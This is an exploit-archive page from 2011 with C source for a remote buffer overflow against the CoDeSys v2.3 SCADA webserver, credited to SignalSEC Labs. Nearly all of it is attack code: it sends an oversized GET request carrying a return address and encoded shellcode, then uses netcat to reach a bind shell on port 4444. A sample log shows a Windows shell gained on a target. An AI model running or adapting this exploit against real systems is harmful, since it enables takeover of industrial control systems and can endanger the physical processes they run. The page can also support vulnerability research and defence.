Home / exploits CoDeSys 2.3 Buffer Overflow
Posted on 02 December 2011
/* CoDeSys v2.3 Industrial Control System Development Software Remote Buffer Overflow Exploit for CoDeSys Scada webserver Author : Celil UNUVER, SignalSEC Labs www.signalsec.com Tested on WinXP SP1 EN THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY! --snip-- root@bt:~# ./codesys 192.168.1.36 CoDeSys v2.3 webserver Remote Exploit by SignalSEC Labs - www.signalsec.com [+]Sending payload to SCADA system! [+]Connecting to port 4444 to get shell! 192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [192.168.1.36] 4444 (?) open Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:Program Files3S SoftwareCoDeSys V2.3visu> --snip-- */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #define name "CoDeSys v2.3 webserver Remote Exploit" #define PORT 8080 #define JUNK "A" int main ( int argc, char *argv[] ) { int sock, i, payload; struct sockaddr_in dest_addr; char *target = "target"; char request[1600], *ptr; char ret[] = "x67x42xa7x71"; //ret - WINXP SP1 EN , mswsock.dll char hellcode[] = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e" "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48" "x4ex36x46x52x46x42x4bx58x45x54x4ex43x4bx38x4ex37" "x45x50x4ax47x41x30x4fx4ex4bx38x4fx54x4ax31x4bx58" "x4fx55x42x52x41x50x4bx4ex49x54x4bx48x46x33x4bx58" "x41x50x50x4ex41x33x42x4cx49x59x4ex4ax46x38x42x4c" "x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx33x46x55x46x42x4ax32x45x47x45x4ex4bx58" "x4fx55x46x42x41x30x4bx4ex48x36x4bx48x4ex50x4bx34" "x4bx48x4fx45x4ex31x41x50x4bx4ex43x30x4ex52x4bx38" "x49x58x4ex36x46x42x4ex41x41x36x43x4cx41x43x4bx4d" "x46x56x4bx48x43x44x42x53x4bx58x42x44x4ex30x4bx48" "x42x47x4ex41x4dx4ax4bx48x42x34x4ax30x50x35x4ax56" "x50x48x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x46" "x43x55x48x56x4ax46x43x53x44x33x4ax36x47x37x43x57" "x44x33x4fx35x46x55x4fx4fx42x4dx4ax36x4bx4cx4dx4e" "x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx55x49x58x45x4e" "x48x46x41x58x4dx4ex4ax50x44x30x45x35x4cx46x44x50" "x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55" "x4fx4fx48x4dx43x45x43x35x43x45x43x55x43x45x43x34" "x43x45x43x44x43x35x4fx4fx42x4dx48x56x4ax36x41x31" "x4ex35x48x46x43x45x49x48x41x4ex45x59x4ax46x46x4a" "x4cx41x42x37x47x4cx47x55x4fx4fx48x4dx4cx36x42x41" "x41x45x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52" "x49x4ex47x45x4fx4fx48x4dx43x55x45x35x4fx4fx42x4d" "x4ax56x45x4ex49x44x48x38x49x54x47x55x4fx4fx48x4d" "x42x55x46x45x46x45x45x45x4fx4fx42x4dx43x49x4ax46" "x47x4ex49x57x48x4cx49x57x47x55x4fx4fx48x4dx45x55" "x4fx4fx42x4dx48x56x4cx46x46x36x48x36x4ax56x43x36" "x4dx46x49x58x45x4ex4cx56x42x45x49x45x49x32x4ex4c" "x49x48x47x4ex4cx56x46x34x49x48x44x4ex41x33x42x4c" "x43x4fx4cx4ax50x4fx44x54x4dx32x50x4fx44x54x4ex52" "x43x39x4dx58x4cx57x4ax43x4bx4ax4bx4ax4bx4ax4ax46" "x44x37x50x4fx43x4bx48x41x4fx4fx45x47x46x34x4fx4f" "x48x4dx4bx35x47x45x44x35x41x35x41x35x41x45x4cx56" "x41x30x41x35x41x35x45x55x41x45x4fx4fx42x4dx4ax56" "x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46" "x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx48x47x55x4ex4f" "x43x58x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d" "x4ax56x4fx4ex50x4cx42x4ex42x56x43x45x4fx4fx48x4d" "x4fx4fx42x4dx5a"; printf (" %s by SignalSEC Labs - www.signalsec.com ", name); if (argc < 2) { printf (" Usage: codesys [IP] "); exit (-1); } setenv (target, argv[1], 1); memset (request, '�', sizeof (request)); ptr = request; strcat (request, "GET /"); for(i = 1; i < 776; i++){ strcat (request, JUNK); } strcat (request, ret); strcat (request, hellcode); strcat (request, " HTTP/1.1"); strcat (request, " "); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror(" socket error "); exit (1); } dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(PORT); if (! inet_aton(argv[1], &(dest_addr.sin_addr))) { perror("inet_aton problems"); exit (2); } memset( &(dest_addr.sin_zero), '�', 8); if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){ perror(" Couldnt connect to target! "); close (sock); exit (3); } payload = (send (sock, ptr, strlen(request), 0)); if (payload == -1) { perror(" Can not send the payload "); close (sock); exit(4); } close (sock); printf (" [+]Sending payload to SCADA system! "); sleep (1); printf (" [+]Connecting to port 4444 to get shell! "); sleep (2); system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'"); exit (0); }
